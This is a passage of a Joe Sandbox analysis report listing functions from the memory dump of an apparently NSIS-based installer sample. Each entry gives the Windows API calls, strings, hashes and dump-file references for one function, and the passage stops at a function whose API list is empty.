Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89

Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86

Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85

Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86

Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86

Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNELBASE(?), ref: 004073C5
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
GlobalFree.KERNELBASE(?), ref: 0040743D
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: Global$AllocFree
String ID:
API String ID: 3394109436-0
Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E

Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15

Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8

Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C

Non-executed Functions

Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 0040512F
GetDlgItem.USER32(?,000003EE), ref: 0040513E
GetClientRect.USER32(?,?), ref: 00405196
GetSystemMetrics.USER32(00000015), ref: 0040519E
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
ShowWindow.USER32(?,00000008), ref: 0040523A
GetDlgItem.USER32(?,000003EC), ref: 0040525B
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
GetDlgItem.USER32(?,000003F8), ref: 0040514D

Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

GetDlgItem.USER32(?,000003EC), ref: 004052AB
CreateThread.KERNEL32(00000000,00000000,Function_00005047,00000000), ref: 004052B9
CloseHandle.KERNEL32(00000000), ref: 004052C0
ShowWindow.USER32(00000000), ref: 004052E7
ShowWindow.USER32(?,00000008), ref: 004052EC
ShowWindow.USER32(00000008), ref: 00405333
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
CreatePopupMenu.USER32 ref: 00405376
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
GetWindowRect.USER32(?,?), ref: 0040539E
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
OpenClipboard.USER32(00000000), ref: 0040540B
EmptyClipboard.USER32 ref: 00405411
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405427
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040545D
SetClipboardData.USER32(0000000D,00000000), ref: 00405468
CloseClipboard.USER32 ref: 0040546E

Strings

@rD, xrefs: 004053D7
New install of "%s" to "%s", xrefs: 00405182
{, xrefs: 00405352

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: @rD$New install of "%s" to "%s"${
API String ID: 2110491804-2409696222
Opcode ID: a32262366b6956f6ce6576a17cc772d230ae976b6d31d5dbcf7d3a173ee933fc
Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
Opcode Fuzzy Hash: a32262366b6956f6ce6576a17cc772d230ae976b6d31d5dbcf7d3a173ee933fc
Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404993
GetDlgItem.USER32(?,00000408), ref: 004049A0
GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
LoadBitmapW.USER32(0000006E), ref: 00404A02
SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
DeleteObject.GDI32(?), ref: 00404A79
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
ShowWindow.USER32(?,00000005), ref: 00404BCF
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
ImageList_Destroy.COMCTL32(?), ref: 00404D9C
GlobalFree.KERNEL32(?), ref: 00404DAC
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
ShowWindow.USER32(?,00000000), ref: 00404F49
GetDlgItem.USER32(?,000003FE), ref: 00404F54
ShowWindow.USER32(00000000), ref: 00404F5B

Strings

, xrefs: 00404F39
M, xrefs: 00404B43
N, xrefs: 00404C06
@, xrefs: 00404B90

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58

Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 004044F9
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
GetDlgItem.USER32(?,000003FB), ref: 00404527
GetAsyncKeyState.USER32(00000010), ref: 0040452E
GetDlgItem.USER32(?,000003F0), ref: 00404543
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
SetWindowTextW.USER32(?,?), ref: 00404583
SHBrowseForFolderW.SHELL32(?), ref: 0040463D
lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
lstrcatW.KERNEL32(?,00462540), ref: 00404686
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
CoTaskMemFree.OLE32(00000000), ref: 00404648

Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000), ref: 00403E8F

GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED

Strings

A, xrefs: 00404636
82D, xrefs: 004046DB
@%F, xrefs: 00404674
@rD, xrefs: 00404610

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: 82D$@%F$@rD$A
API String ID: 3347642858-1086125096
Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59

Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

